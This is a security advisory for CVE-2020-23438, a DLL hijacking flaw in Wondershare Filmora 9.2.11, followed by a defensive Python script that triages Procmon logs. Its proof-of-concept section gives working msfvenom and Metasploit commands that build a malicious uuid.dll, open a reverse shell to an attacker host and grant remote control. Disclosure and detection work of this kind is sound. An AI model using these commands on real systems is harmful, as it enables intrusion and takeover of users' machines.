CVE-2020-23438: Wondershare Filmora 9.2.11 – Trojan DLL Hijacking Leading to Privilege Escalation

Vulnerable Software: Wondershare Filmora

Vulnerability: Trojan DLL Hijacking

Affected Version: Up to 9.2.11

Fixed Version: No Fix Available

Vendor Homepage: Link

CVE: CVE-2020-23438

CVE Author: Tejas Nitin Pingulkar

Exploit Available: POC

Vulnerability Overview

Wondershare Filmora 9.2.11 is vulnerable to DLL hijacking, allowing an attacker with local access to execute arbitrary code by placing a malicious DLL (uuid.dll) in a specific user-writable directory.

The application incorrectly searches for DLLs in multiple locations, including:
C:\Users\<username>\AppData\Local\Microsoft\WindowsApps

An attacker can craft a malicious DLL and place it in this directory. When Wondershare Filmora is launched, it loads the malicious DLL, executing the attacker’s code with elevated privileges.

Exploit

1. Identifying the Vulnerable DLL Load Path

Use Process Monitor (Procmon) to identify missing DLLs loaded by Filmora.

Steps:

  1. Run Process Monitor (Procmon.exe).
  2. Apply Filters:
    • Process Name is Filmora.exe → Add
    • Path contains .dll → Add
    • Result is NAME NOT FOUND → Apply
  3. Run Wondershare Filmora and analyze logs.
  4. Confirm that Filmora attempts to load uuid.dll from: “Path: C:\Users\<username>\AppData\Local\Microsoft\WindowsApps”

2. Creating the Malicious DLL

  1. Generate a malicious DLL using msfvenom: sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.33.128 LPORT=8888 -f dll -o uuid.dll

3. Placing the Malicious DLL in the Vulnerable Directory

  1. Once uuid.dll is created, place it in the vulnerable path: C:\Users\<username>\AppData\Local\Microsoft\WindowsApps

4. Setting Up a Metasploit Listener

  1. msfconsole
  2. use exploit/multi/handler
  3. set payload windows/meterpreter/reverse_tcp
  4. set LHOST [ATTACKER IP ADDRESS]
  5. set LPORT [PORT NUMBER]
  6. exploit

5. Triggering the Exploit

  1. Launch Wondershare Filmora.
  2. Filmora attempts to load uuid.dll from C:\Users\<username>\AppData\Local\Microsoft\WindowsApps.
  3. Our malicious DLL executes, establishing a reverse shell back to the attacker’s machine.
  4. Meterpreter session is opened in Metasploit, allowing full remote control.
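
For defenders reviewing a Procmon capture like the one in step 1, the following added example (not part of the original advisory) triages a CSV export: it separates DLL probes that reach a user-writable directory from DLLs that were actually loaded from one. The column names follow Procmon's CSV export; the sample rows, the user name alice and the "anything under C:\Users is user-writable" heuristic are assumptions made for illustration.

```python
import csv
import io
from pathlib import PureWindowsPath

# Constructed sample in Procmon's CSV export layout (not captured from a real host).
SAMPLE_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.1","Filmora.exe","4321","CreateFile","C:\Users\alice\AppData\Local\Microsoft\WindowsApps\uuid.dll","NAME NOT FOUND",""
"10:01:02.2","Filmora.exe","4321","Load Image","C:\Windows\System32\kernel32.dll","SUCCESS",""
"10:01:02.3","Filmora.exe","4321","CreateFile","C:\Windows\System32\missing.dll","NAME NOT FOUND",""
"10:05:40.7","Filmora.exe","5120","Load Image","C:\Users\alice\AppData\Local\Microsoft\WindowsApps\uuid.dll","SUCCESS",""
'''

def is_user_writable(path):
    # Assumption: treat every path below <drive>:\Users as writable by a standard user.
    parts = [p.lower() for p in PureWindowsPath(path).parts]
    return len(parts) > 2 and parts[1] == "users"

def triage(csv_text, process="Filmora.exe"):
    """Return (kind, dll_path) findings; kind is 'exposed' or 'loaded'."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Process Name"].lower() != process.lower():
            continue
        path = row["Path"]
        if not path.lower().endswith(".dll") or not is_user_writable(path):
            continue
        if row["Operation"] == "CreateFile" and row["Result"] == "NAME NOT FOUND":
            findings.append(("exposed", path))  # search order reaches a user-writable dir
        elif row["Operation"] == "Load Image" and row["Result"] == "SUCCESS":
            findings.append(("loaded", path))   # a DLL was mapped from that dir: investigate
    return findings

if __name__ == "__main__":
    for kind, path in triage(SAMPLE_CSV):
        print(f"{kind:8} {path}")
```

An "exposed" row shows the application is open to this class of hijack; a "loaded" row means a DLL is already present in the user-writable directory and should be examined.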

POC (screenshots):

  • Identifying the Vulnerable DLL Load Path
  • Creating the Malicious DLL
  • Setting Up a Metasploit Listener
  • Placing the Malicious DLL in the Vulnerable Directory
  • Triggering the Exploit
  • Meterpreter session is opened in Metasploit, allowing full remote control